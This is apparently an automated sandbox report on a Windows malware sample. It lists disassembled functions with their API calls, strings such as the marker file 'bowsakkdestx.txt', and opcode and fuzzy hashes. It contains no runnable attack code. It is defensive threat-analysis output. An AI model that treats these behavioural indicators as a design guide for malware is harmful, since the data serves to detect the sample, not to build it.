                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscmp
                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                    • API String ID: 856254489-711371036
                                                                                                                                                    • Opcode ID: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                                                                                                                                                    • Instruction ID: be6dee110b44ec76455643647cb0bd3c477e6d53c765760a4e3a4e904bc1756d
                                                                                                                                                    • Opcode Fuzzy Hash: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                                                                                                                                                    • Instruction Fuzzy Hash: EF01C4A2608215B6EB34BA59DC42FAE37899F0C3A4F105417F948D6281F77CEB4042DC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$AppendFolder
                                                                                                                                                    • String ID: bowsakkdestx.txt
                                                                                                                                                    • API String ID: 29327785-2616962270
                                                                                                                                                    • Opcode ID: 2ff3820fc979cadc2d718cc47527bb84fec077d0b0a7e9b7b01ca983f6060952
                                                                                                                                                    • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                                                                                    • Opcode Fuzzy Hash: 2ff3820fc979cadc2d718cc47527bb84fec077d0b0a7e9b7b01ca983f6060952
                                                                                                                                                    • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassCursorLoadRegister
                                                                                                                                                    • String ID: 0$LPCWSTRszWindowClass
                                                                                                                                                    • API String ID: 1693014935-1496217519
                                                                                                                                                    • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                                                                    • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                                                                                                                                    • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                                                                    • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$AppendDeleteFileFolder
                                                                                                                                                    • String ID: bowsakkdestx.txt
                                                                                                                                                    • API String ID: 610490371-2616962270
                                                                                                                                                    • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                                                                    • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                                                                                    • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                                                                    • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove_strtok
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3446180046-0
                                                                                                                                                    • Opcode ID: 26ecba1af734d67abcddf069fb71295571f6332d11be29335550415d4ddae36b
                                                                                                                                                    • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                                                                                    • Opcode Fuzzy Hash: 26ecba1af734d67abcddf069fb71295571f6332d11be29335550415d4ddae36b
                                                                                                                                                    • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2974526305-0
                                                                                                                                                    • Opcode ID: cf66a750bedb6f5ba2027215b38929a94097dc17af3891ec01d9af7a23108488
                                                                                                                                                    • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                                                                                    • Opcode Fuzzy Hash: cf66a750bedb6f5ba2027215b38929a94097dc17af3891ec01d9af7a23108488
                                                                                                                                                    • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C709
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C73F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                    • Opcode ID: 545b86b4f69abcc520aee3959e2c1e78f1be635744476d2f07a63b5a2a38a0c0
                                                                                                                                                    • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                                                                                    • Opcode Fuzzy Hash: 545b86b4f69abcc520aee3959e2c1e78f1be635744476d2f07a63b5a2a38a0c0
                                                                                                                                                    • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004C7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                                                                                                                                      • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                                                                                                                                      • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                                                                                                                                    • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                                                                                                                                    • CallCatchBlock.LIBCMT ref: 004C70F8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2901542994-0
                                                                                                                                                    • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                    • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                                                                                                                                                    • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                    • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004253B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                                                                                                                                      • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 00425A01
                                                                                                                                                      • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                                                                                                                                    • __lock.LIBCMT ref: 00425A37
                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 00425A43
                                                                                                                                                    • __lock.LIBCMT ref: 00425A57
                                                                                                                                                      • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2580527540-0
                                                                                                                                                    • Opcode ID: 9925ebe33404cbde23c1fb2f9b399b2968a8912f67deb2e26b2c525534b3c5e5
                                                                                                                                                    • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                                                                                                                                    • Opcode Fuzzy Hash: 9925ebe33404cbde23c1fb2f9b399b2968a8912f67deb2e26b2c525534b3c5e5
                                                                                                                                                    • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                                    • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                    • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                                                                                    • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                    • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32 ref: 004127B9
                                                                                                                                                    • _malloc.LIBCMT ref: 004127C3
                                                                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00710000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                                                                    • _memset.LIBCMT ref: 004127CE
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2824100046-0
                                                                                                                                                    • Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                                                                                    • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                                                                                    • Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                                                                                    • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenA.KERNEL32 ref: 00412806
                                                                                                                                                    • _malloc.LIBCMT ref: 00412814
                                                                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00710000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                                                                    • _memset.LIBCMT ref: 0041281F
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2824100046-0
                                                                                                                                                    • Opcode ID: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                                                                                                                                                    • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                                                                                                                                    • Opcode Fuzzy Hash: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                                                                                                                                                    • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                                                                    • Opcode ID: 9bedb6a4875daed597998ed3f540e95eec51a82ba5ae0fcf6873f5b611974ef0
                                                                                                                                                    • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                                                                                    • Opcode Fuzzy Hash: 9bedb6a4875daed597998ed3f540e95eec51a82ba5ae0fcf6873f5b611974ef0
                                                                                                                                                    • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00470040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: .\crypto\asn1\tasn_new.c
                                                                                                                                                    • API String ID: 2102423945-2878120539
                                                                                                                                                    • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                                                                    • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                                                                                                                                                    • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                                                                    • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                                                                    • Opcode ID: 7df1e10ad76e29fab8b9693ecc8e3a17a06a76cc108172ebea4210ab36e9a770
                                                                                                                                                    • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                                                                                    • Opcode Fuzzy Hash: 7df1e10ad76e29fab8b9693ecc8e3a17a06a76cc108172ebea4210ab36e9a770
                                                                                                                                                    • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
